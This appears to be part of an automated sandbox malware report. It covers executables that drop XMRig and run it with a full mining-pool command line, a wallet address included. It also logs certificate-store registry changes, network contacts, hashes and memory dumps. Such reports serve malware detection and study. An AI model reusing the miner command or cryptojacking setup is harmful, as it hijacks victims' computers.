8b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 772 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 772 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,3549704109630749084,1975543916261970610,262144 --variations-seed-version --mojo-platform-channel-handle=1064 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1408,i,3549704109630749084,1975543916261970610,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2460-14-0x0000018D87440000-0x0000018D87460000-memory.dmp
memory/2460-15-0x0000018D88E30000-0x0000018D88E50000-memory.dmp
memory/2460-16-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-17-0x0000018D88E50000-0x0000018D88E70000-memory.dmp
memory/2460-18-0x0000018D88E70000-0x0000018D88E90000-memory.dmp
memory/2460-19-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-20-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-21-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-22-0x0000018D88E50000-0x0000018D88E70000-memory.dmp
memory/2460-23-0x0000018D88E70000-0x0000018D88E90000-memory.dmp
memory/2460-24-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-25-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-26-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-27-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-28-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-29-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-30-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-31-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-32-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-33-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-34-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-35-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-36-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-37-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-38-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-39-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-40-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-41-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-42-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-43-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-44-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-45-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-46-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-47-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-48-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-49-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-50-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-51-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-52-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-53-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-54-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-55-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-56-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-57-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-58-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-59-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-60-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-61-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-62-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-63-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-64-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-65-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-66-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-67-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-68-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-69-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-70-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-71-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-72-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-73-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-74-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-75-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-76-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-77-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-78-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-79-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-80-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-81-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
memory/2460-82-0x00007FF6B8080000-0x00007FF6B8B83000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:35
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2944 wrote to memory of 756 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2944 wrote to memory of 756 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 5.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/756-14-0x00000269FAD50000-0x00000269FAD70000-memory.dmp
memory/756-15-0x00000269FC740000-0x00000269FC760000-memory.dmp
memory/756-16-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-17-0x00000269FC780000-0x00000269FC7A0000-memory.dmp
memory/756-18-0x00000269FC760000-0x00000269FC780000-memory.dmp
memory/756-19-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-20-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-23-0x00000269FC760000-0x00000269FC780000-memory.dmp
memory/756-22-0x00000269FC780000-0x00000269FC7A0000-memory.dmp
memory/756-21-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-24-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-25-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-26-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-27-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-28-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-29-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-30-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-31-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-32-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-33-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-34-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-35-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-36-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-37-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-38-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-39-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-40-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-41-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-42-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-43-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-44-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-45-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-46-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-47-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-48-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-49-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-50-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-51-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-52-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-53-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-54-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-55-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-56-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-57-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-58-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-59-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-60-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-61-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-62-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-63-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-64-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-65-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-66-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-67-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-68-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-69-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-70-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-71-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-72-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-73-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-74-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-75-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-76-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-77-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-78-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-79-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-80-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-81-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
memory/756-82-0x00007FF6F8A10000-0x00007FF6F9513000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:37
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
